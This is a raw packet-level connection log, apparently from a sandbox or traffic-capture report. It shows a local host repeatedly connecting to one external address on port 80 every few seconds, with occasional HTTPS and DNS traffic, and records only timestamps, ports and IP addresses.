Nov 21, 2024 22:15:05.832161903 CET	50187	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:05.832161903 CET	50187	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:06.746406078 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:06.746705055 CET	50188	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:06.866307020 CET	80	50188	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:06.866362095 CET	80	50186	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:06.866394997 CET	50188	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:06.866425037 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:06.866672039 CET	50188	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:06.986273050 CET	80	50188	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:08.249428988 CET	80	50188	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:08.249488115 CET	50188	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:08.271867990 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:08.271903992 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:08.272663116 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:08.272787094 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:08.272800922 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:09.854885101 CET	50188	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:09.855092049 CET	50196	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:09.952409983 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:09.954289913 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:09.954301119 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:09.954830885 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:09.955192089 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:09.955281019 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:09.955460072 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:09.974701881 CET	80	50196	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:09.974778891 CET	80	50188	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:09.974865913 CET	50188	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:09.974875927 CET	50196	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:09.975229979 CET	50196	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:09.999335051 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:10.040000916 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:10.094858885 CET	80	50196	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:10.418854952 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:10.418963909 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:10.419059992 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:10.419909954 CET	50195	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:15:10.419929028 CET	443	50195	20.110.205.119	192.168.2.5
Nov 21, 2024 22:15:11.398477077 CET	80	50196	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:11.398530006 CET	50196	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:11.417821884 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.417920113 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.418339014 CET	50167	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:11.485866070 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.485937119 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.486006975 CET	50166	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:11.590898991 CET	50167	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:11.590933084 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.590948105 CET	50166	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:11.590979099 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:12.661617994 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:12.661700964 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:12.661771059 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:12.661988020 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:12.662103891 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:12.662158966 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:12.916215897 CET	50196	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:12.916616917 CET	50207	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:13.036072016 CET	80	50196	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:13.036143064 CET	50196	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:13.036144972 CET	80	50207	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:13.036216021 CET	50207	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:13.036607981 CET	50207	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:13.148449898 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:13.148524046 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:13.148698092 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:13.148718119 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:13.156038046 CET	80	50207	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:14.399468899 CET	80	50207	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:14.399961948 CET	50207	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:16.031954050 CET	50207	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:16.032433987 CET	50228	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:16.152014017 CET	80	50207	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:16.152075052 CET	80	50228	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:16.152081966 CET	50207	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:16.152142048 CET	50228	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:16.152431965 CET	50228	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:16.272068024 CET	80	50228	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:17.492866039 CET	80	50228	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:17.492974997 CET	50228	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:19.011118889 CET	50228	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:19.011451006 CET	50235	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:19.131268978 CET	80	50228	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:19.131290913 CET	80	50235	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:19.131361008 CET	50228	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:19.131386042 CET	50235	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:19.131704092 CET	50235	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:19.251601934 CET	80	50235	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:20.525924921 CET	80	50235	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:20.526068926 CET	50235	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:22.151885986 CET	50235	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:22.152296066 CET	50239	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:22.271850109 CET	80	50235	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:22.271862984 CET	80	50239	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:22.274130106 CET	50239	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:22.274149895 CET	50235	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:22.274375916 CET	50239	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:22.397536039 CET	80	50239	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:23.712764978 CET	80	50239	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:23.712821960 CET	50239	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:25.230011940 CET	50239	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:25.230421066 CET	50240	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:25.350509882 CET	80	50240	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:25.350616932 CET	50240	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:25.350941896 CET	80	50239	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:25.351000071 CET	50239	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:25.382942915 CET	50240	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:25.502501965 CET	80	50240	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:26.708947897 CET	80	50240	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:26.709712029 CET	50240	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:28.340114117 CET	50240	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:28.340581894 CET	50252	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:28.460002899 CET	80	50240	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:28.460041046 CET	80	50252	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:28.460135937 CET	50240	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:28.460189104 CET	50252	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:28.460587025 CET	50252	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:28.580138922 CET	80	50252	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:29.805591106 CET	80	50252	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:29.805668116 CET	50252	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:31.325371981 CET	50252	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:31.329519033 CET	50275	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:31.445194006 CET	80	50252	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:31.445311069 CET	50252	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:31.448981047 CET	80	50275	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:31.449146032 CET	50275	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:31.449347019 CET	50275	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:31.570360899 CET	80	50275	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:32.797910929 CET	80	50275	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:32.797971964 CET	50275	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:34.432522058 CET	50275	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:34.432845116 CET	50296	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:34.552232027 CET	80	50275	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:34.552287102 CET	50275	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:34.552354097 CET	80	50296	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:34.552447081 CET	50296	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:34.552690983 CET	50296	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:34.673933029 CET	80	50296	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:35.940511942 CET	80	50296	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:35.940623045 CET	50296	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:37.448348999 CET	50296	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:37.448348999 CET	50306	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:37.568869114 CET	80	50306	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:37.569159985 CET	80	50296	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:37.569278955 CET	50296	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:37.569278955 CET	50306	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:37.569524050 CET	50306	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:37.689023972 CET	80	50306	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:38.952680111 CET	80	50306	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:38.952753067 CET	50306	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:40.573273897 CET	50306	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:40.573753119 CET	50310	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:40.693104982 CET	80	50306	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:40.693186045 CET	80	50310	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:40.693186045 CET	50306	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:40.693258047 CET	50310	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:40.693546057 CET	50310	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:40.813544035 CET	80	50310	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:42.082746029 CET	80	50310	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:42.082859993 CET	50310	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:43.589143038 CET	50310	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:43.589142084 CET	50323	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:43.709038973 CET	80	50323	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:43.709276915 CET	80	50310	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:43.709382057 CET	50310	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:43.709460974 CET	50323	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:43.709630966 CET	50323	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:43.829205990 CET	80	50323	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:45.101988077 CET	80	50323	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:45.102087021 CET	50323	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:46.731512070 CET	50323	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:46.731916904 CET	50336	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:46.851545095 CET	80	50323	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:46.851572990 CET	80	50336	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:46.851603985 CET	50323	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:46.851656914 CET	50336	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:46.851939917 CET	50336	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:46.972501040 CET	80	50336	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:48.229470015 CET	80	50336	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:48.229628086 CET	50336	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:49.744986057 CET	50336	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:49.745662928 CET	50343	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:49.865195036 CET	80	50336	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:49.865266085 CET	80	50343	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:49.865436077 CET	50336	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:49.865464926 CET	50343	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:49.865668058 CET	50343	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:49.985312939 CET	80	50343	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:51.257313013 CET	80	50343	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:51.257416964 CET	50343	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:52.870932102 CET	50343	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:52.871218920 CET	50345	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:52.990906954 CET	80	50345	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:52.991036892 CET	50345	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:52.991254091 CET	80	50343	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:52.991334915 CET	50343	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:52.993266106 CET	50345	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:53.112845898 CET	80	50345	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:54.323214054 CET	80	50345	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:54.323278904 CET	50345	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:54.711575031 CET	50345	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:54.831576109 CET	80	50345	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:54.831640959 CET	50345	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:55.839003086 CET	50348	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:55.958655119 CET	80	50348	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:55.959557056 CET	50348	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:55.959598064 CET	50348	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:56.079662085 CET	80	50348	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:57.353544950 CET	80	50348	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:57.359396935 CET	50348	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:58.995707989 CET	50348	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:58.996139050 CET	50350	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:59.115801096 CET	80	50350	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:59.115885973 CET	50350	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:59.116142988 CET	80	50348	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:59.116188049 CET	50348	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:59.116435051 CET	50350	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:59.235904932 CET	80	50350	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:00.502609968 CET	80	50350	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:00.502675056 CET	50350	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:02.011873007 CET	50350	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:02.011876106 CET	50353	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:02.132112980 CET	80	50353	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:02.132188082 CET	80	50350	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:02.132323980 CET	50350	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:02.132330894 CET	50353	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:02.132677078 CET	50353	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:02.252283096 CET	80	50353	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:03.514820099 CET	80	50353	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:03.517466068 CET	50353	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:04.641556978 CET	49822	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:04.761327028 CET	53	49822	1.1.1.1	192.168.2.5
Nov 21, 2024 22:16:04.761419058 CET	49822	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:04.881288052 CET	53	49822	1.1.1.1	192.168.2.5
Nov 21, 2024 22:16:05.153400898 CET	50353	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:05.153809071 CET	49823	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:05.273375988 CET	80	49823	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:05.275536060 CET	49823	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:05.275778055 CET	49823	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:05.275784969 CET	80	50353	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:05.279448986 CET	50353	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:05.395509005 CET	80	49823	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:05.896451950 CET	49822	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:06.016402006 CET	53	49822	1.1.1.1	192.168.2.5
Nov 21, 2024 22:16:06.016644001 CET	49822	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:06.652935028 CET	80	49823	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:06.653034925 CET	49823	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:08.167046070 CET	49823	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:08.167156935 CET	49825	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:08.286950111 CET	80	49825	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:08.287045002 CET	49825	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:08.287081957 CET	80	49823	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:08.287156105 CET	49823	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:08.287337065 CET	49825	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:08.407053947 CET	80	49825	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:09.633805990 CET	80	49825	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:09.635399103 CET	49825	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:11.261653900 CET	49825	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:11.262002945 CET	49826	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:11.381985903 CET	80	49825	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:11.382008076 CET	80	49826	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:11.382452965 CET	49825	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:11.382452011 CET	49826	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:11.382698059 CET	49826	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:11.502276897 CET	80	49826	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:12.722959995 CET	80	49826	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:12.723023891 CET	49826	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:14.230056047 CET	49827	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:14.230062008 CET	49826	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:14.350147963 CET	80	49827	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:14.350239992 CET	49827	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:14.350399017 CET	80	49826	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:14.350461960 CET	49826	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:14.350575924 CET	49827	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:14.470506907 CET	80	49827	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:15.750852108 CET	80	49827	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:15.751394033 CET	49827	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:17.370328903 CET	49827	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:17.373583078 CET	49828	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:17.490658045 CET	80	49827	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:17.493423939 CET	49827	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:17.493582964 CET	80	49828	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:17.493730068 CET	49828	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:17.497375965 CET	49828	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:17.616930008 CET	80	49828	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:18.929112911 CET	80	49828	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:18.929177999 CET	49828	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:20.434006929 CET	49828	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:20.434415102 CET	49829	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:20.554033995 CET	80	49829	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:20.554065943 CET	80	49828	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:20.554132938 CET	49829	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:20.554167032 CET	49828	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:20.554511070 CET	49829	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:20.673985004 CET	80	49829	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:22.017170906 CET	80	49829	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:22.019608974 CET	49829	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:23.651850939 CET	49829	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:23.651859045 CET	49830	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:23.771595001 CET	80	49830	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:23.772025108 CET	80	49829	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:23.772058010 CET	49830	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:23.775336981 CET	49830	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:23.775499105 CET	49829	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:23.894970894 CET	80	49830	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:25.159796953 CET	80	49830	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:25.159979105 CET	49830	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:26.667923927 CET	49830	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:26.668248892 CET	49831	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:26.787744045 CET	80	49831	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:26.787808895 CET	80	49830	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:26.787834883 CET	49831	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:26.787880898 CET	49830	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:26.788206100 CET	49831	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:26.907742977 CET	80	49831	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:28.180253029 CET	80	49831	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:28.180408001 CET	49831	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:29.807913065 CET	49832	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:29.807979107 CET	49831	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:29.927655935 CET	80	49832	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:29.927793980 CET	49832	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:29.928020954 CET	49832	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:29.928116083 CET	80	49831	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:29.928664923 CET	49831	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:30.047586918 CET	80	49832	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:31.362492085 CET	80	49832	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:31.362584114 CET	49832	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:32.871273994 CET	49832	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:32.871639013 CET	49833	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:32.991215944 CET	80	49833	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:32.991291046 CET	49833	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:32.991365910 CET	80	49832	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:32.991431952 CET	49832	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:32.991607904 CET	49833	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:33.111201048 CET	80	49833	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:34.377887964 CET	80	49833	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:34.378092051 CET	49833	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:35.469427109 CET	50104	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:35.590095043 CET	53	50104	1.1.1.1	192.168.2.5
